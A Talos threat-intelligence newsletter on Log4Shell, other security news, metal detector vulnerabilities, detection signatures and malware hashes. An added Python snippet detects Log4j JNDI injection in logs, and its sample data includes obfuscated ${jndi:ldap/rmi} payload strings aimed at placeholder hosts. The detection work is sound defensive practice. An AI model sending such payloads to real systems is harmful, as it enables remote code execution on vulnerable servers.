Threat Source Newsletter (Jan. 6, 2022)

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers.  

We hope everyone had some well-deserved, relaxing time off over the holidays. Unfortunately, we are all back now and Log4j is still an issue.

And even though it seems like Log4j has already been in the news for a year, it's actually only been a few weeks. There were several other stories from 2021 worth looking back on, from the fallout of SolarWinds to the Kaseya supply chain attack. Take a look back with us to see what we can learn from the past year with our Year in Review.

We also released a new video walkthrough, which you can watch above, that covers how to safely and securely set up a new IoT assistant. Many of you may have received a new Google Home or Alexa smart device. And while these devices certainly come with inherent cybersecurity risks, there are many ways to set them up with privacy settings to keep you secure. Follow along with me and leave any feedback you have in the comments about what settings you use with your IoT devices.


Cybersecurity week in review


  • The Log4Shell exploit in Log4j continues to be top-of-mind for defenders across the globe heading into 2022. Everyone from state-sponsored actors to the average cybercriminal is using this exploit in the wild to carry out hands-on keyboard attacks and drop remote shells on targeted machines.
  • The U.S. Federal Trade Commission is warning it could take legal action against companies that don't appropriately patch for Log4j. The agency said in a statement the vulnerability poses a “severe risk to millions of consumer products to enterprise software and web applications.”
  • Google released a security update for its Chrome browser, fixing 37 vulnerabilities. Chrome 97.0.4692.71 includes a patch for one critical use-after-free vulnerability identified as CVE-2022-0096.
  • A New York State investigation found that 1.1 million accounts have been compromised as part of credential-stuffing attacks affecting 17 companies. The State's Attorney General said the companies are “well-known online retailers, restaurant chains and food delivery services.”
  • Missouri's governor is still planning to pursue legal action against a local reporter who reported a security vulnerability in the state's education department website. The reporter viewed the source code of the page in a browser, revealing an issue that left sensitive information unprotected.
  • The U.S. Cybersecurity and Infrastructure Security Agency is establishing a network of cybersecurity liaisons in each state. The federal representatives will help states establish cybersecurity policies and plans, test them and help them apply for federal grants. 
  • A coding error in Microsoft Exchange Server briefly shut down on-premises email delivery to kick off the year. Exchange Server did not properly accommodate the year 2022 in dates, leading some to jokingly refer to the issue as "Y2K22."
  • Some medical licenses in Maryland are being delayed after a December cyber attack on the state's Department of Health website. Some first-time applicants had to delay start dates at new jobs by weeks waiting for the appropriate approvals.
  • Attackers are exploiting a vulnerability in Google Docs' commenting feature to send phishing links to Microsoft Outlook users. Using comments as the attack vector makes it easier for the links to slip through email filters and scanners.


Notable recent security issues


Log4j continues to haunt defenders even after holiday break 

A critical vulnerability in Log4j is still under active exploitation weeks after it was initially disclosed. Microsoft released a warning this week that its customers are still seeing state-sponsored actors and cyber criminals target the widely used library. The vulnerability could allow an attacker to completely take over an affected server. Log4Shell, the nickname given to this vulnerability, will likely take years to remediate because of how widely the software component is used in applications and services. It can be leveraged in default configurations by an unauthenticated remote attacker to target applications that make use of the Log4j library. This vulnerability, tracked as CVE-2021-44228, received the maximum CVSS severity score of 10.0, and is widely believed to be easy to exploit. This library may also be used as a dependency by a variety of web applications found in enterprise environments, including Elastic. Due to the nature of this vulnerability, Cisco Talos believes this will be a widely exploited vulnerability among attackers moving forward, and users should patch affected products and implement mitigation solutions as soon as possible.
Snort SIDs: 58722 - 58744, 58751, 58784 - 58790, 58795, 58801 and 58811-58814 
Snort 3 SIDs: 300055 - 300058 

ClamAV signatures: 
  • Java.Exploit.CVE_2021_44228-9914600-1 
  • Java.Exploit.CVE_2021_44228-9914601-1 
  • Java.Exploit.CVE_2021_44228-9914600-2 
  • Java.Exploit.CVE_2021_44228-9914601-4 
  • Java.Exploit.CVE_2021_44228-9915330-0 
  • Java.Malware.CVE_2021_44228-9915820-0 
  • Java.Malware.CVE_2021_44228-9915819-0 
  • Java.Malware.CVE_2021_44228-9915818-0 
  • Java.Malware.CVE_2021_44228-9915817-0 
  • Java.Malware.CVE_2021_44228-9915816-0 
  • Java.Malware.CVE_2021_44228-9915813-0 
  • Java.Malware.CVE_2021_44228-9915812-0 
  • PUA.Java.Tool.CVE_2021_44228-9916978-0 
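Log4Shell fires when an attacker-controlled JNDI lookup string such as `${jndi:...}` reaches a field that a vulnerable Log4j 2 instance logs, and in-the-wild requests often wrap that string in nested lookups to dodge naive pattern matching. The following Python is an added illustration of a log-side detection check, not Talos code and not one of the Snort or ClamAV signatures listed above; the log lines and hostnames are constructed placeholders.

```python
import re

# Constructed sample web-server log lines (not from the newsletter). Hosts use
# the reserved .invalid TLD and are placeholders, not real indicators.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Jan/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.invalid/a}"',
    '10.0.0.7 - - [06/Jan/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://c2.invalid/b}"',
    '10.0.0.8 - - [06/Jan/2022:10:00:04 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:rmi://c2.invalid/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.6 - - [06/Jan/2022:10:00:05 +0000] "GET /?d=${date:yyyy-MM-dd} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Innermost ${...} with no nested braces; resolved repeatedly from the inside out.
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve_inner(token):
    """Evaluate one innermost lookup as Log4j 2 would for the forms used to hide
    the literal 'jndi'. Returns None for lookups we do not model (left in place)."""
    if ":-" in token:                  # ${env:NOPE:-j} and ${::-j} -> default value 'j'
        return token.split(":-", 1)[1]
    name, _, arg = token.partition(":")
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return None

def normalize(s, max_rounds=32):
    """Collapse nested lookups until nothing more resolves (bounded to avoid loops)."""
    for _ in range(max_rounds):
        changed = False
        def sub(m):
            nonlocal changed
            r = resolve_inner(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r
        s = INNER.sub(sub, s)
        if not changed:
            break
    return s

# Match on the normalized text so obfuscated variants hit the same rule.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def scan(lines):
    """Return 1-based numbers of lines whose normalized form contains a JNDI lookup."""
    return [n for n, line in enumerate(lines, 1) if JNDI.search(normalize(line))]
```

Running `scan(SAMPLE_LOG)` flags lines 2, 3 and 4; the benign `${date:...}` lookup on line 5 is left alone because only the lookup forms that resolve to literal text are collapsed.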
 

Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices 

Cisco Talos recently discovered multiple vulnerabilities in a device from Garrett Metal Detectors that could allow remote attackers to bypass authentication requirements, manipulate metal detector configurations, and even execute arbitrary code on the device. The vulnerabilities specifically exist in the Garrett iC module, which provides network connectivity to the Garrett PD 6500i or Garrett MZ 6100 walk-through metal detectors commonly used at security checkpoints. An attacker could manipulate this module to remotely monitor statistics on the metal detector, such as whether the alarm has been triggered or how many visitors have walked through. They could also make configuration changes, such as altering the sensitivity level of a device, which potentially poses a security risk to users who rely on these metal detectors.
Snort SIDs: 58013 - 58017 


Most prevalent malware files this week


MD5: a5e345518e6817f72c9b409915741689 
Typical Filename: swupdater.exe 
Claimed Product: Wavesor SWUpdater 
Detection Name: W32.1B259D8CA9.Wavesor.SSO.Talos 

MD5: 34560233e751b7e95f155b6f61e7419a  
Typical Filename: SAntivirusService.exe  
Claimed Product: A n t i v i r u s S e r v i c e  
Detection Name: PUA.Win.Dropper.Segurazo::tpd 

MD5: cbd421ed5799f498e42ec6c598dc0aef  
Typical Filename: N/A 
Claimed Product: N/A  
Detection Name: W32.Auto:0fa5cf6590.in03.Talos 

MD5: fe3659119e683e1aa07b2346c1f215af 
Typical Filename: SqlServerWorks.Runner.exe 
Claimed Product: SqlServerWorks.Runner 
Detection Name: W32.8639FD3EF8-95.SBX.TG 
 
MD5: 3f75eb823cd1a73e4c89185fca77cb38 
Typical Filename: signup.png 
Claimed Product: N/A 
Detection Name: Win.Dropper.Generic::231945.in02 

Keep up with all things Talos by following us on Twitter. Snort and ClamAV also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here and Talos Takes here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.
